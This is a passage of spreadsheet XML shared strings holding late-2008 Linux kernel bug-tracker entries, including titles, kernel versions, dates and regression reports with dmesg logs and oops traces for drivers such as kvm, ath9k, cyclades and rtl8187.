  </si>
  <si>
    <t>2008-11-24 05:17 UTC</t>
  </si>
  <si>
    <t>2012-05-14 16:34 UTC</t>
  </si>
  <si>
    <t>there seems to be an yet-to-be-fixed race-condition in virtual console handling causing duplicate sysfs oops. see https://bugzilla.novell.com/show_bug.cgi?id=446114 and http://lkml.org/lkml/2008/8/26/87 and http://lkml.org/lkml/2008/10/13/203 discussion/possible fixes: http://lkml.org/lkml/2008/5/13/52 this one http://lkml.org/lkml/2008/7/22/33 already is in 2.6.27 (commit 47aa5793f78c274d51711f6a621fa6b02d4e6402) but it seems it`s not complete solution.</t>
  </si>
  <si>
    <t>kvm: vmap allocation failed</t>
  </si>
  <si>
    <t>2.6.28-rc3-ext4</t>
  </si>
  <si>
    <t>2008-11-24 21:19 UTC</t>
  </si>
  <si>
    <t>Peng Tao</t>
  </si>
  <si>
    <t>2008-11-29 08:31 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26-1-686 Earliest failing kernel version: don't know yet, just updated to 2.6.28-rc3-ext4, and kvm fails Distribution: Debian sid Hardware Environment: Intel(R) Core(TM)2 Duo CPU T8100 @ 2.10GHz 1G DDR2 ram Software Environment: QEMU PC emulator version 0.9.1 (kvm-72) Problem Description: kvm can't run guest OS, saying kvm_run: Cannot allocate memory kvm_run returned -12 dmesg says kvm: guest NX capability removed kvm: guest NX capability removed vmap allocation failed: use vmalloc=&lt;size&gt; to increase size. BTW, qemu still works. So I guess this is a bug in kvm. Steps to reproduce: create an image with qemu-img and install any guest OS in it. run the image with kvm will fail as described above.</t>
  </si>
  <si>
    <t>2008-11-24 21:24 UTC</t>
  </si>
  <si>
    <t>2008-11-29 08:32 UTC</t>
  </si>
  <si>
    <t>Nokia 5310 storage-mode</t>
  </si>
  <si>
    <t>2008-11-25 01:07 UTC</t>
  </si>
  <si>
    <t>Robson Roberto Souza Peixoto</t>
  </si>
  <si>
    <t>2008-12-21 03:18 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.27 Distribution: ArchLinux Hardware Environment: USB(ohci,ehci) Software Environment: gcc 4.3.2, glibc 2.8 Problem Description: When I plug in my Nokia 5310 show a msg in cel "Transferring data" and in computer nothing happend. dmesg said: [49112.206059] usb 3-2: new full speed USB device using uhci_hcd and address 6 [49112.349137] usb 3-2: default language 0x0409 [49112.364540] usb 3-2: uevent [49112.385945] usb 3-2: usb_probe_device [49112.386280] usb 3-2: configuration #1 chosen from 1 choice [49112.389175] usb 3-2: adding 3-2:1.0 (config #1, interface 0) [49112.389395] usb 3-2:1.0: uevent [49112.389510] libusual 3-2:1.0: usb_probe_interface [49112.389633] libusual 3-2:1.0: usb_probe_interface - got id [49112.389734] usb-storage 3-2:1.0: usb_probe_interface [49112.389825] usb-storage 3-2:1.0: usb_probe_interface - got id [49112.440873] scsi5 : SCSI emulation for USB Mass Storage devices [49112.449462] drivers/usb/core/inode.c: creating file '006' [49112.449966] usb 3-2: New USB device found, idVendor=0421, idProduct=006a [49112.450124] usb 3-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [49112.450229] usb 3-2: Product: Nokia 5310 XpressMusic [49112.450332] usb 3-2: Manufacturer: Nokia [49112.450431] usb 3-2: SerialNumber: 358990016328676 [49112.450532] hub 3-0:1.0: state 7 ports 2 chg 0000 evt 0004 [49112.450636] usb-storage: device found at 6 [49112.450721] usb-storage: waiting for device to settle before scanning [49114.000132] hub 2-0:1.0: hub_suspend [49114.000353] usb usb2: bus auto-suspend [49114.000443] ehci_hcd 0000:00:1d.7: suspend root hub [49117.454373] scsi 5:0:0:0: Direct-Access Nokia Nokia 5310 Xpres 0000 PQ: 0 ANSI: 4 [49117.468153] sd 5:0:0:0: [sdb] 7741441 512-byte hardware sectors (3964 MB) [49117.471155] sd 5:0:0:0: [sdb] Write Protect is off [49117.471387] sd 5:0:0:0: [sdb] Mode Sense: 04 00 00 00 [49117.471476] sd 5:0:0:0: [sdb] Assuming drive cache: write through [49117.484198] sd 5:0:0:0: [sdb] 7741441 512-byte hardware sectors (3964 MB) [49117.491222] sd 5:0:0:0: [sdb] Write Protect is off [49117.491230] sd 5:0:0:0: [sdb] Mode Sense: 04 00 00 00 [49117.491233] sd 5:0:0:0: [sdb] Assuming drive cache: write through [49117.491237] sdb: sdb1 [49117.502834] sd 5:0:0:0: [sdb] Attached SCSI removable disk [49117.502930] sd 5:0:0:0: Attached scsi generic sg2 type 0 [49117.503218] usb-storage: device scan complete [49117.785148] sd 5:0:0:0: [sdb] Sense Key : 0x0 [current] [49117.785158] sd 5:0:0:0: [sdb] ASC=0x0 ASCQ=0x0 [49117.794501] sd 5:0:0:0: [sdb] Sense Key : 0x0 [current] [49117.794511] sd 5:0:0:0: [sdb] ASC=0x0 ASCQ=0x0 [49117.803901] sd 5:0:0:0: [sdb] Sense Key : 0x0 [current] [49117.803910] sd 5:0:0:0: [sdb] ASC=0x0 ASCQ=0x0 [49117.810163] sd 5:0:0:0: [sdb] Sense Key : 0x0 [current] [49117.810172] sd 5:0:0:0: [sdb] ASC=0x0 ASCQ=0x0 [49117.819157] sd 5:0:0:0: [sdb] Sense Key : 0x0 [current] [49117.819166] sd 5:0:0:0: [sdb] ASC=0x0 ASCQ=0x0 [49117.827259] sd 5:0:0:0: [sdb] Sense Key : 0x0 [current] [49117.827269] sd 5:0:0:0: [sdb] ASC=0x0 ASCQ=0x0 [49117.834394] sd 5:0:0:0: [sdb] Sense Key : 0x0 [current] ........ Steps to reproduce: always</t>
  </si>
  <si>
    <t>resume (S2R) broken by Intel microcode module, on A110L</t>
  </si>
  <si>
    <t>2.6.28-rc6</t>
  </si>
  <si>
    <t>2008-11-25 08:48 UTC</t>
  </si>
  <si>
    <t>2008-12-22 07:02 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.7 Earliest failing kernel version: 2.6.28-rc3 I believe Distribution: Ubuntu 8.10 Hardware Environment: AcerOne A110L Software Environment: Problem Description: Using pm-suspend helper for S2R, box is entirely dead on resume. Fiddled about 1.5 hours with a DRM-fixed (see bug # 11947) -rc6 and various boot / version combos until I finally figured out that unloading microcode module re-enables successful resume. No problem whatsoever with S2R on 2.6.27 and 2.6.27.7, with microcode remaining loaded. No suspicious microcode messages in dmesg, however init.d microcode loader script fails (will supply error message soon). Filing as "blocking" since after having experienced a couple dozen suspend-related major issues I'm awfully annoyed, sick and tired of having to discover yet another suspend regression every other week (yes, do take this literally). IOW, RESUME BUGS OUGHTA BE BLOCKING DAMMIT PERIOD. Not to mention that I'm pre-annoyed by A110L/A150L kernel compatibility level (see existing discussions on LKML about A150), thus my tolerance level went rock-bottom, sorry. Thanks, Andreas Mohr</t>
  </si>
  <si>
    <t>mac80211/ath5k : missing 2 bytes in monitor mode for ACK frames</t>
  </si>
  <si>
    <t>2.6.28-rc6-wl</t>
  </si>
  <si>
    <t>2008-11-25 12:22 UTC</t>
  </si>
  <si>
    <t>2009-02-09 11:44 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: n/a Earliest failing kernel version: 2.6.28-rc6-wl Distribution: Ubuntu / Debian Hardware Environment: CM9 Atheros 802.11abg card Software Environment: Problem Description: missing 2 FCS bytes Steps to reproduce: 1. Load ath5k and mac80211 2. Create a monitor interface (iw phy phy0 interface add mon0 type monitor) 3. Run wireshark on it (wireshark -i mon0 -k) 4. Check for 802.11 ACK frames The FCS field (last bytes of the frame) is only 2 bytes instead of 4 bytes.</t>
  </si>
  <si>
    <t>Regression: Vendor backlight control in sony-laptop stopped working</t>
  </si>
  <si>
    <t>2008-11-26 03:25 UTC</t>
  </si>
  <si>
    <t>Kshitij Kulshreshtha</t>
  </si>
  <si>
    <t>2008-12-09 04:30 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: v2.6.28-rc4 Earliest failing kernel version: v2.6.28-rc5 Distribution: openSUSE 11 Hardware Environment: x86 Sony VAIO FS115 Laptop Problem Description: Commit 540b8bb9c33935183ceb5bed466a42ad72b2af56 "sony-laptop: fingers off backlight if video.ko is serving this functionality" introduces reversed logic to test for generic backlight support in drivers/misc/sony-laptop.c Steps to reproduce: 1. Boot kernel v2.6.28-rc5 or newer, with kernel parameter acpi_backlight=vendor, on a Sony VAIO laptop which uses SBRT/GBRT ACPI Methods to control backlight. 2. load video.ko and sony-laptop.ko 3. Backlight control does not work. dmesg has the following: sony-laptop: Sony: Brightness ignored, must be controlled by ACPI video driver</t>
  </si>
  <si>
    <t>ath9k causes computer to hang after long data transmissions</t>
  </si>
  <si>
    <t>2.6.27.10 (Ubuntu 2.6.27-11-generic)</t>
  </si>
  <si>
    <t>2008-11-27 03:23 UTC</t>
  </si>
  <si>
    <t>Barry Green</t>
  </si>
  <si>
    <t>2009-04-11 14:03 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:N/A Earliest failing kernel version:2.6.27-7-generic Distribution:Ubuntu 8.10 Hardware Environment:Athlon 64 X2 5600+. Linksys WMP300N PCI card, Linksys WAG325N Wireless-N router. Software Environment:compat-wireless-2008-11-26 Problem Description: After doing a "sudo modprobe ath9k", the system will continue to run for just under 3 minutes. I start a ping to the local router, which reports destination unreachable for a couple of minutes, then starts to respond. About 10 seconds after it starts to respond, the whole system hangs. Video freezes, no mouse/keyboard, no disk activity, and I have to do a hard reset. The last time I tested, the Linksys router actually crashed at the same time and I had to hard reboot it too. This has only happened once though, so may have been a coincidence (hell of a coincidence though). Steps to reproduce: - Blacklist ath9k so that it doesn't freeze the computer on startup. - Do "sudo modprobe ath9k". I get the same problem whether I'm using WPA2 encryption, or no encryption at all.</t>
  </si>
  <si>
    <t>Brightness on thinkpad T61 not settable after DPMS screen blanker</t>
  </si>
  <si>
    <t>2008-11-28 02:44 UTC</t>
  </si>
  <si>
    <t>I have a problem with the screen brightness. I've configured my kernel like described here: http://www.thinkwiki.org/wiki/LCD_Brightness (disabling CONFIG_THINKPAD_ACPI_VIDEO and using acpi-video) It usually works fine, brightness can be set through the proc interface and through the fn-buttons. Though after xorg blanks the screen with dpms, this doesn't work. Screen stays on very low brightness, setting with the proc interface has no effect on the screen. After restarting X, everything works fine again. I'm not sure if this is the right place to report this (or if this is some xorg-driver issue?), if not please point me to the right place.</t>
  </si>
  <si>
    <t>[Block layer or SCSI] requests aborted too early during check_partition()</t>
  </si>
  <si>
    <t>2008-11-29 05:19 UTC</t>
  </si>
  <si>
    <t>2008-12-03 22:38 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.4 Earliest failing kernel version: 2.6.28-rc6 (I didn't test earlier -rcs yet) Hardware Environment: OxSemi 912 and 92x based FireWire harddisks See http://marc.info/?l=linux-scsi&amp;m=122774022130397 -- Disks may still spin their motor up when the kernel attempts to read partitions. In kernel 2.6.27, this was handled transparently. But since 2.6.28-rc?, the kernel immediately aborts the associated requests and sets the new scsi_device offline.</t>
  </si>
  <si>
    <t>Hibernation regression on Toshiba Portege R500</t>
  </si>
  <si>
    <t>2.6.28-rc6-git1</t>
  </si>
  <si>
    <t>2008-11-29 07:00 UTC</t>
  </si>
  <si>
    <t>2009-08-01 19:21 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.28-rc1 (AFAICS) Distribution: openSUSE 11.0 Hardware Environment: Toshiba Portege R500 Problem Description: Box hangs 50% of the time (or more) during resume from hibernation. Steps to reproduce: Hibernate and try to resume.</t>
  </si>
  <si>
    <t>sync_core crashes on 486 class CPUs</t>
  </si>
  <si>
    <t>2008-11-29 08:29 UTC</t>
  </si>
  <si>
    <t>2012-07-01 09:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian etchnhalf Hardware Environment: Cyrix 6x86 processor Software Environment: Linux 2.6.24 as provided by debian Problem Description: The debian provided 2.6.24 kernel crashes on 6x86 during boot with an invalid opcode exception. The cause is that CONFIG_PARAVIRT is enabled, which causes the kernel to patch itself as soon as it detects it runs on bare hardware. The kernel patch function text_poke runs sync_core() after patching, which contains a CPUID instruction, as that is serializing. The 6x86 processor does not support this instruction unless explicitly enabled, so an invalid opcode exception is reported. Steps to reproduce: Compile a kernel with paravirt support and run it on a system with a non-CPUID-capable processor. Suggested fix: As sync_core is only used after microcode update or code patching, performance of sync_core doesn't seem critical, so add a test whether CPUID is supported to sync_core (or alternative.c instead). CPUs that might need this strong kind of serialization should all support CPUID.</t>
  </si>
  <si>
    <t>After suspend to RAM I cannot wake up my computer again</t>
  </si>
  <si>
    <t>2.6.27-9-generic</t>
  </si>
  <si>
    <t>2008-11-30 06:50 UTC</t>
  </si>
  <si>
    <t>2012-05-14 16:25 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu 8.10 Intrepid Hardware Environment: Samsung r70/a009 Software Environment: Gnome 2.24 or kde 4.1.3 Problem Description: After suspend to RAM I cannot wake up my computer again. In /var/log/messages there is nothing related with this moment (like if it just do nothing) and the computer is on but with the screen off and without noise of anything (not the hard-disk nor the processor fan) working. Steps to reproduce: I make the suspend using the shutdown -&gt; suspend button from the gnome menu (and the same for kde).</t>
  </si>
  <si>
    <t>cyclades multiport driver - module load error path does not free resources</t>
  </si>
  <si>
    <t>2008-12-02 03:44 UTC</t>
  </si>
  <si>
    <t>Florian Lohoff</t>
  </si>
  <si>
    <t>2010-01-25 14:10 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.18 (first encountered the problem and reported) Distribution: Debian Hardware Environment: x86 Software Environment: Problem Description: The module load error path in cyclades driver is broken. In case the external serial breakout box is not connected the driver reports with 0 ports. After unloading the module its impossible to load the module again because some resources are still in use. Doing a cat on /proc/ioports crashes the machine. Reported as Debian bug #429011 - http://bugs.debian.org/429011 against 2.6.18 and verified to still exist against 2.6.26 (linux-image-2.6.26-1-686 2.6.26-12~snapshot.12453) Oops when catting /proc/ioports [ 202.976225] BUG: unable to handle kernel paging request at c8a06e6b [ 202.980065] IP: [&lt;c01e1802&gt;] strnlen+0x6/0x18 [ 202.980065] *pde = 07419067 *pte = 00000000 [ 202.980065] Oops: 0000 [#1] SMP [ 202.980065] Modules linked in: autofs4 ac battery ipv6 dm_snapshot dm_mirror dm_log dm_mod firmware_class snd_ens1371 +gameport snd_rawmidi snd_seq_device snd_ac97_codec ac97_bus rng_core parport_pc parport intel_agp button shpchp i2c_i801 + snd_pcm snd_timer i2c_core snd soundcore snd_page_alloc agpgart evdev iTCO_wdt pci_hotplug floppy pcspkr joydev ext3 jb +d mbcache ide_disk ata_generic libata scsi_mod dock uhci_hcd piix usbcore e100 mii ide_core thermal processor fan therma +l_sys [last unloaded: cyclades] [ 202.980065] [ 202.980065] Pid: 2520, comm: cat Not tainted (2.6.26-1-686 #1) [ 202.980065] EIP: 0060:[&lt;c01e1802&gt;] EFLAGS: 00010297 CPU: 0 [ 202.980065] EIP is at strnlen+0x6/0x18 [ 202.980065] EAX: c8a06e6b EBX: c6509346 ECX: c8a06e6b EDX: fffffffe [ 202.980065] ESI: c8a06e6b EDI: ffffffff EBP: c650a000 ESP: c77f5da4 [ 202.980065] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 202.980065] Process cat (pid: 2520, ti=c77f4000 task=c77eea20 task.ti=c77f4000) [ 202.980065] Stack: c01e0c60 c77f5f1c c6509346 c77f5f1c ffffffff c01e0f35 ffffffff ffffffff [ 202.980065] 00000000 00000cca c6509336 0000bc12 00000010 c650a000 00000000 ffffffff [ 202.980065] c0311510 c1109420 00000086 000005fd 00000000 4250e0f7 0000002f 4250f6c7 [ 202.980065] Call Trace: [ 202.980065] [&lt;c01e0c60&gt;] string+0x27/0x6f [ 202.980065] [&lt;c01e0f35&gt;] vsnprintf+0x28d/0x452 [ 202.980065] [&lt;c0133b28&gt;] hrtimer_forward+0xe4/0x100 [ 202.980065] [&lt;c013604c&gt;] getnstimeofday+0x37/0xbc [ 202.980065] [&lt;c0108066&gt;] pit_next_event+0x25/0x30 [ 202.980065] [&lt;c0138770&gt;] clockevents_program_event+0xc4/0xd2 [ 202.980065] [&lt;c0139472&gt;] tick_dev_program_event+0x1e/0x82 [ 202.980065] [&lt;c0139525&gt;] tick_program_event+0x1f/0x23 [ 202.980065] [&lt;c0134658&gt;] hrtimer_interrupt+0x12d/0x155 [ 202.980065] [&lt;c012956e&gt;] run_timer_softirq+0x30/0x17c [ 202.980065] [&lt;c0153b87&gt;] __rcu_process_callbacks+0x8e/0x154 [ 202.980065] [&lt;c0126579&gt;] __do_softirq+0x66/0xd3 [ 202.980065] [&lt;c018a209&gt;] seq_printf+0x2b/0x48 [ 202.980065] [&lt;c0126de5&gt;] r_show+0x5b/0x64 [ 202.980065] [&lt;c018a7bb&gt;] seq_read+0x196/0x26f [ 202.980065] [&lt;c018a625&gt;] seq_read+0x0/0x26f [ 202.980065] [&lt;c01a1162&gt;] proc_reg_read+0x58/0x6b [ 202.980065] [&lt;c01a110a&gt;] proc_reg_read+0x0/0x6b [ 202.980065] [&lt;c0174992&gt;] vfs_read+0x81/0x11e [ 202.980065] [&lt;c0174de3&gt;] sys_read+0x3c/0x63 [ 202.980065] [&lt;c01038ce&gt;] syscall_call+0x7/0xb [ 202.980065] ======================= [ 202.980065] Code: c9 74 0c f2 ae 74 05 bf 01 00 00 00 4f 89 fa 5f 89 d0 c3 85 c9 57 89 c7 89 d0 74 05 f2 ae 75 01 4f 8 [ 202.980065] EIP: [&lt;c01e1802&gt;] strnlen+0x6/0x18 SS:ESP 0068:c77f5da4 [ 202.980065] ---[ end trace 3c1a37ae88182d0f ]--- Steps to reproduce: Disconnect external serial breakout box (poweroff before) modprobe cyclades rmmod cyclades modprobe cyclades (reports fail to load because of resource in use) cat /proc/ioports (throws oops) Last git commits against the error path on cyclades have been for 2.6.22.</t>
  </si>
  <si>
    <t>Chenge default assignee of group Other/Configuration</t>
  </si>
  <si>
    <t>BugZilla</t>
  </si>
  <si>
    <t>2008-12-02 12:22 UTC</t>
  </si>
  <si>
    <t>2008-12-17 10:54 UTC</t>
  </si>
  <si>
    <t>All bugs entered where people select "Other|Configuration" are assigned to Roman Zippel. But this is seldom the correct choice and I would suggest to use a mailling list or similar as replacement. If none of the standard list suffice then use: linux-kbuild@vger.kernel.org but use this as last resort please...</t>
  </si>
  <si>
    <t>Huge wakeups number from i1915</t>
  </si>
  <si>
    <t>2.6.28-rc6-00209-g6a12141</t>
  </si>
  <si>
    <t>2008-12-03 14:10 UTC</t>
  </si>
  <si>
    <t>2008-12-31 12:27 UTC</t>
  </si>
  <si>
    <t>Subject : Huge wakeups number from i1915 Submitter : "Yves-Alexis Perez" &lt;corsac@debian.org&gt; Date : 2008-12-02 16:48 References : http://marc.info/?l=linux-acpi&amp;m=122823656702994&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Mmiotrace regression in 2.6.28-rc6</t>
  </si>
  <si>
    <t>2008-12-03 14:22 UTC</t>
  </si>
  <si>
    <t>2008-12-07 12:09 UTC</t>
  </si>
  <si>
    <t>Subject : Mmiotrace regression in 2.6.28-rc6 Submitter : Pekka Paalanen &lt;pq@iki.fi&gt; Date : 2008-11-23 13:41 References : http://marc.info/?l=linux-kernel&amp;m=122744774317151&amp;w=4 Notify-Also : Steven Rostedt &lt;rostedt@goodmis.org&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression in 2.6.28-rc and 2.6.27-stable - hibernate related</t>
  </si>
  <si>
    <t>2008-12-03 14:25 UTC</t>
  </si>
  <si>
    <t>Subject : Regression in 2.6.28-rc and 2.6.27-stable - hibernate related Submitter : "Fabio Comolli" &lt;fabio.comolli@gmail.com&gt; Date : 2008-11-23 16:17 References : http://marc.info/?l=linux-kernel&amp;m=122745709926361&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>commit b1ee26b freezes system on switching from X to text console</t>
  </si>
  <si>
    <t>commit b1ee26b</t>
  </si>
  <si>
    <t>2008-12-03 14:42 UTC</t>
  </si>
  <si>
    <t>2008-12-11 11:37 UTC</t>
  </si>
  <si>
    <t>Subject : commit b1ee26b "radeonfb: accelerate imageblit and other improvements" freezes system on switching from X to text console Submitter : Gaudenz Steinlin &lt;gaudenz@debian.org&gt; Date : 2008-11-25 19:44 References : http://marc.info/?l=linux-kernel&amp;m=122764344231140&amp;w=4 Handled-By : Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.28-rc6-git1 -- No sound produced from Intel HDA ALSA driver</t>
  </si>
  <si>
    <t>2008-12-03 14:51 UTC</t>
  </si>
  <si>
    <t>2009-04-06 01:21 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc6-git1 -- No sound produced from Intel HDA ALSA driver Submitter : "Miles Lane" &lt;miles.lane@gmail.com&gt; Date : 2008-11-27 20:33 References : http://marc.info/?l=linux-kernel&amp;m=122781805620212&amp;w=4 Handled-By : "Takashi Iwai" &lt;tiwai@suse.de&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[i915 drm] irq 16: nobody cared with latest git kernels</t>
  </si>
  <si>
    <t>2008-12-03 15:09 UTC</t>
  </si>
  <si>
    <t>2009-01-04 00:02 UTC</t>
  </si>
  <si>
    <t>Subject : [i915 drm] irq 16: nobody cared with latest git kernels Submitter : "fredi ml" &lt;mailinglists.fredi@gmail.com&gt; Date : 2008-12-02 13:26 References : http://marc.info/?l=linux-kernel&amp;m=122822444615724&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Commit 7cd5b08be3 breaks startup on Toshiba Portege R500</t>
  </si>
  <si>
    <t>Commit 7cd5b08be3</t>
  </si>
  <si>
    <t>2008-12-03 15:25 UTC</t>
  </si>
  <si>
    <t>2008-12-03 17:12 UTC</t>
  </si>
  <si>
    <t>Subject : Regression from 2.6.28-rc7: Commit 7cd5b08be3 breaks startup on Toshiba Portege R500 Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2008-12-03 22:00 References : http://marc.info/?l=linux-kernel&amp;m=122834170321535&amp;w=4 Handled-By : Linus Torvalds &lt;torvalds@linux-foundation.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122834271623218&amp;w=4 Notify-Also : Frans Pop &lt;elendil@planet.nl&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[PATCH]mptsas driver cannot discover some hotplugged SATA/SAS disks</t>
  </si>
  <si>
    <t>2.6.28-rc6, 2.6.26.2, 2.6.22.16</t>
  </si>
  <si>
    <t>2008-12-04 00:38 UTC</t>
  </si>
  <si>
    <t>Cheng Renquan</t>
  </si>
  <si>
    <t>2012-05-22 16:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: No Earliest failing kernel version: 2.6.22.16 Distribution: LinuxFromScratch-6.4 Hardware Environment: LSI-MPTSAS-1068E (http://www.lsi.com/storage_home/products_home/standard_product_ics/sas_ics/lsisas1068e/index.html) Software Environment: Problem Description: mptsas driver cannot discover some hotplugged SATA/SAS disks Steps to reproduce: 1. use LSI-SAS-1068E controller to manage multiple disks, including disks on multiple JBODs; 2. hotunplug and hotplug the disks at random places; Result: 1. disks direct attached can can rediscovered, disks on the last JBOD can also be rediscovered, other disks cannot. Like this, disks on HEAD and JBOD3 can be rediscovered, others on JBOD1 and JBOD2 cannot. HEAD &lt;=&gt; JBOD1 &lt;=&gt; JBOD2 &lt;=&gt; JBOD3 Reproducible: always</t>
  </si>
  <si>
    <t>2.6.27.6 vmware guest panics on boot with CONFIG_VMI=Y</t>
  </si>
  <si>
    <t>2008-12-05 11:52 UTC</t>
  </si>
  <si>
    <t>Norman Back</t>
  </si>
  <si>
    <t>2012-05-14 16:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.5 Earliest failing kernel version: 2.6.27.6 Distribution: Gentoo vanilla-sources Hardware Environment: AMD Software Environment: vmware-workstation 6.5 Problem Description: 2.6.27.6 vmware guest panics on boot with CONFIG_VMI=Y Steps to reproduce: Compile 2.6.27.6 with CONFIG_VMI=Y and boot as guest in vmware-workstation 6.5. Kernel panics Int 14 CR2 Bisection between 2.6.27.5 and 2.6.27.6 gives 5c371b31be32033b0a4a993431484da8a2305369 is first bad commit commit 5c371b31be32033b0a4a993431484da8a2305369 Author: Yinghai Lu &lt;yhlu.kernel@gmail.com&gt; Date: Mon Sep 22 02:52:26 2008 -0700 x86: fix CONFIG_X86_RESERVE_LOW_64K=y commit 2216d199b1430d1c0affb1498a9ebdbd9c0de439 upstream The bad_bios_dmi_table() quirk never triggered because we do DMI setup too late. Move it a bit earlier. Also change the CONFIG_X86_RESERVE_LOW_64K quirk to operate on the e820 table directly instead of messing with early reservations - this handles overlaps (which do occur in this low range of RAM) more gracefully. Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt; :040000 040000 b7b81ffb62eddf60c2d8545a61566f0d34c1b2a9 858d983687c53db5304015a245ee0c23f10c266d M arch See http://bugs.gentoo.org/show_bug.cgi?id=249751</t>
  </si>
  <si>
    <t>[memcg BUG ?] failed to boot on IA64 with CONFIG_DISCONTIGMEM=y</t>
  </si>
  <si>
    <t>2.6.28-rc7</t>
  </si>
  <si>
    <t>2008-12-07 13:29 UTC</t>
  </si>
  <si>
    <t>2008-12-11 10:53 UTC</t>
  </si>
  <si>
    <t>Subject : [memcg BUG ?] failed to boot on IA64 with CONFIG_DISCONTIGMEM=y Submitter : Li Zefan &lt;lizf@cn.fujitsu.com&gt; Date : 2008-12-05 3:09 References : http://marc.info/?l=linux-kernel&amp;m=122844668532752&amp;w=4 Handled-By : KAMEZAWA Hiroyuki &lt;kamezawa.hiroyu@jp.fujitsu.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122844757701505&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Unloading rtl8187 generates a GPF if SLUB poison debugging is enabled</t>
  </si>
  <si>
    <t>2008-12-09 07:33 UTC</t>
  </si>
  <si>
    <t>2009-01-13 11:39 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: None Earliest failing kernel version: All Distribution: openSUSE 11.0 Hardware Environment: x86_64 Software Environment: rtl8187 Problem Description: Unloading driver rtl8187 generates a GPF if SLUB debugging is enabled and the system is booted with the 'slub_debug=P' option. The reason for the GPF is that the driver attempts to free a urb that has already been freed - a classic 'use-after-free' situation. The crash dump is as follows: kernel: general protection fault: 0000 [#1] SMP kernel: last sysfs file: /sys/devices/system/cpu/cpu1/cache/index2shared_cpu_map kernel: CPU 0 kernel: Modules linked in: rtl8187(-) eeprom_93cx6 snd_pcm_oss snd_mixer_oss snd_seq snd_seq_device af_packet sunrpc rfkill_input cpufreq_conservative cpufreq_userspace cpufreq_powersave powernow_k8 fuse loop dm_mod ide_cd_mod cdrom arc4 ecb b43 rfkill snd_hda_intel mac80211 led_class amd74xx snd_pcm input_polldev snd_timer snd cfg80211 k8temp soundcore hwmon ide_pci_generic ssb serio_raw forcedeth sg snd_page_alloc ide_core battery ac button joydev sd_mod ohci_hcd uhci_hcd ehci_hcd usbcore edd fan thermal processor ext3 mbcache jbd ahci libata scsi_mod [last unloaded: usbtest] kernel: Pid: 8057, comm: modprobe Not tainted 2.6.28-rc7 #29 kernel: RIP: 0010:[&lt;ffffffff8031cf99&gt;] [&lt;ffffffff8031cf99&gt;] kref_get+0xc/0x2b kernel: RSP: 0018:ffff8800b9eb5b48 EFLAGS: 00010096 kernel: RAX: 0000000000000000 RBX: 6b6b6b6b6b6b6dbb RCX: 0000000000000016 kernel: RDX: 0000000000000301 RSI: ffffffff8020bf3b RDI: 6b6b6b6b6b6b6dbb kernel: RBP: ffff8800b9eb5b58 R08: 00000003b9fdc830 R09: ffffffffa00fc2a0 kernel: R10: ffffffff8025b866 R11: ffffffff8089a2b0 R12: ffff8800b8f1bc80 kernel: R13: 0000000000000286 R14: 00000000fffffffe R15: ffff8800b8dd2020 kernel: FS: 00007f320f7086f0(0000) GS:ffffffff8070a600(0000) knlGS:00000000f7d1c6c0 kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b kernel: CR2: 00007f770e627000 CR3: 00000000b9f17000 CR4: 00000000000006e0 kernel: DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 kernel: DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 kernel: Process modprobe (pid: 8057, threadinfo ffff8800b9eb4000, task ffff8800b9fdc830) kernel: Stack: kernel: ffff8800b9eb5b78 6b6b6b6b6b6b6d83 ffff8800b9eb5b78 ffffffff8031c1cd kernel: ffff8800b9f69cc0 6b6b6b6b6b6b6b6b ffff8800b9eb5b88 ffffffff80399f75 kernel: ffff8800b9eb5ba8 ffffffffa00f7401 00000000ffffffd5 0000000000000000 kernel: Call Trace: kernel: [&lt;ffffffff8031c1cd&gt;] kobject_get+0x1a/0x22 kernel: [&lt;ffffffff80399f75&gt;] get_device+0x17/0x1f kernel: [&lt;ffffffffa00f7401&gt;] usb_get_dev+0x1d/0x24 [usbcore] kernel: [&lt;ffffffffa00fc2b7&gt;] usb_hcd_unlink_urb+0x39/0x81 [usbcore] kernel: 